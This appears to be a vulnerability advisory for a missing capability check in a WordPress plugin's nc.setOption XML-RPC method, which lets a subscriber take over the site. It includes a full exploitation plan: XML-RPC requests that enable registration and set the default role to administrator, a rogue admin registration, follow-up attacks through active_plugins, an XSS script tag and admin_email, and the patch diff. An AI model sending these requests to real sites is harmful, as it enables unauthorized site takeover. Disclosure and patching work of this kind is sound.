Welcome Software Publishing <= 0.0.31 - Authenticated (Subscriber+) Arbitrary Options Update to Privilege Escalation via 'nc.setOption' XML-RPC Method
Description
The Welcome Software Publishing plugin for WordPress is vulnerable to Arbitrary Options Update in all versions up to and including 0.0.31. This is due to a missing capability check in the nc_setOption() function, which is exposed via the nc.setOption XML-RPC method. The function authenticates the user via $wp_xmlrpc_server->login() (verifying credentials are valid) but does not perform any authorization check such as current_user_can('manage_options'). This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary WordPress options via XML-RPC requests. This can be leveraged to change the default_role option to 'administrator' and then register a new administrator account, achieving full privilege escalation and site takeover.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=0.0.31# Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing) ## 1. Vulnerability Summary The **Welcome Software Publishing** (slug: `newscred-publishing`) plugin (<= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-…
Show full research plan
Exploitation Research Plan: CVE-2026-4297 (Welcome Software Publishing)
1. Vulnerability Summary
The Welcome Software Publishing (slug: newscred-publishing) plugin (<= 0.0.31) contains a missing authorization vulnerability in its XML-RPC implementation. The plugin registers a custom XML-RPC method nc.setOption which maps to the PHP function nc_setOption(). While this function authenticates the provided credentials using the core WordPress XML-RPC server's login method, it fails to verify if the authenticated user possesses the necessary capabilities (like manage_options) to modify site settings. Consequently, any authenticated user—including those with the lowest privileges (Subscriber)—can update arbitrary WordPress options, leading to full site takeover via privilege escalation.
2. Attack Vector Analysis
- Endpoint:
http://<target-site>/xmlrpc.php - Method:
nc.setOption(XML-RPC) - Payload Format: XML-RPC
methodCallwith 4 parameters:username,password,option_name, andoption_value. - Authentication: Authenticated (Subscriber+)
- Preconditions:
- The plugin must be active.
- XML-RPC must be enabled (enabled by default in WordPress).
- The attacker must have valid credentials for a Subscriber-level account.
3. Code Flow
- Registration: The plugin uses the
xmlrpc_methodsfilter to registernc.setOption.- Likely registration code (inferred):
add_filter('xmlrpc_methods', function($methods) { $methods['nc.setOption'] = 'nc_setOption'; return $methods; });
- Likely registration code (inferred):
- Entry Point: An XML-RPC request hits
xmlrpc.phpwith<methodName>nc.setOption</methodName>. - Authentication:
nc_setOption($args)is called. The first two elements of$argsare typically used to call$wp_xmlrpc_server->login($username, $password). - Vulnerable Sink: If
login()returns aWP_Userobject, the function proceeds to callupdate_option($args[2], $args[3]). - The Flaw: There is no check like
if ( ! current_user_can( 'manage_options' ) ) return new IXR_Error( 403, '...' );between the login and the option update.
4. Nonce Acquisition Strategy
XML-RPC methods do not use WordPress nonces. Authentication is handled per-request via the username and password parameters included in the XML body. No nonce extraction or browser session is required for this specific attack vector.
5. Exploitation Strategy
The goal is to enable registration and ensure new users are created as Administrators.
Step 1: Enable User Registration
Change the users_can_register option to 1.
Request:
- URL:
http://<wp-host>/xmlrpc.php - Method: POST
- Headers:
Content-Type: text/xml - Body:
<?xml version="1.0"?>
<methodCall>
<methodName>nc.setOption</methodName>
<params>
<param><value><string>subscriber_user</string></value></param>
<param><value><string>subscriber_pass</string></value></param>
<param><value><string>users_can_register</string></value></param>
<param><value><string>1</string></value></param>
</params>
</methodCall>
Step 2: Set Default Role to Administrator
Change the default_role option to administrator.
Request:
- URL:
http://<wp-host>/xmlrpc.php - Method: POST
- Headers:
Content-Type: text/xml - Body:
<?xml version="1.0"?>
<methodCall>
<methodName>nc.setOption</methodName>
<params>
<param><value><string>subscriber_user</string></value></param>
<param><value><string>subscriber_pass</string></value></param>
<param><value><string>default_role</string></value></param>
<param><value><string>administrator</string></value></param>
</params>
</methodCall>
Step 3: Register a New User
Perform an unauthenticated registration.
Request:
- URL:
http://<wp-host>/wp-login.php?action=register - Method: POST
- Headers:
Content-Type: application/x-www-form-urlencoded - Body:
user_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register
6. Test Data Setup
- Install/Activate Plugin: Ensure
newscred-publishing(Welcome Software Publishing) <= 0.0.31 is active. - Create Subscriber:
wp user create subscriber_user subscriber@example.com --role=subscriber --user_pass=subscriber_pass
- Ensure XML-RPC is open: (Default state).
7. Expected Results
- Steps 1 & 2: The XML-RPC server should return a success response (likely a boolean
trueor the updated value wrapped in<value><boolean>1</boolean></value>). - Step 3: The registration should succeed, and the database should reflect a new user
attacker_adminwith theadministratorrole.
8. Verification Steps
After running the exploit, verify the site state using WP-CLI:
- Check Registration Status:
wp option get users_can_register(Should return1) - Check Default Role:
wp option get default_role(Should returnadministrator) - Confirm New Admin User:
wp user get attacker_admin --field=roles(Should returnadministrator)
9. Alternative Approaches
If the plugin validates the specific options allowed for update, or if direct user registration is blocked by a WAF, alternative options can be targeted:
- RCE via
active_plugins: Updateactive_pluginsto include a path to a previously uploaded malicious file (if any). - Persistent XSS: Update
blognameorblogdescriptionto include a script tag<script>alert(1)</script>to target an actual administrator visiting the dashboard. - Site Takeover via
admin_email: Updateadmin_emailto the attacker's email, then trigger a password reset for the primary administrator account.
Summary
The Welcome Software Publishing plugin (<= 0.0.31) exposes a custom XML-RPC method 'nc.setOption' that allows authenticated users to update arbitrary WordPress options without capability checks. A subscriber-level user can exploit this to enable public registration and set the default user role to administrator, leading to full site takeover.
Security Fix
@@ -1,5 +1,9 @@ function nc_setOption($args) { global $wp_xmlrpc_server; if (!$user = $wp_xmlrpc_server->login($args[0], $args[1])) { return $wp_xmlrpc_server->error; } + + if (!current_user_can('manage_options')) { + return new IXR_Error(403, 'Insufficient permissions to manage options.'); + } update_option($args[2], $args[3]); return true; }
Exploit Outline
The exploit targets the xmlrpc.php endpoint using the 'nc.setOption' method. An attacker provides Subscriber-level credentials to authenticate via the XML-RPC server's login mechanism. Once authenticated, the attacker sends two sequential requests: the first to set the 'users_can_register' option to '1', and the second to set the 'default_role' option to 'administrator'. Following these changes, the attacker registers a new account via the standard WordPress registration page, which results in the creation of a new administrator-level user.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.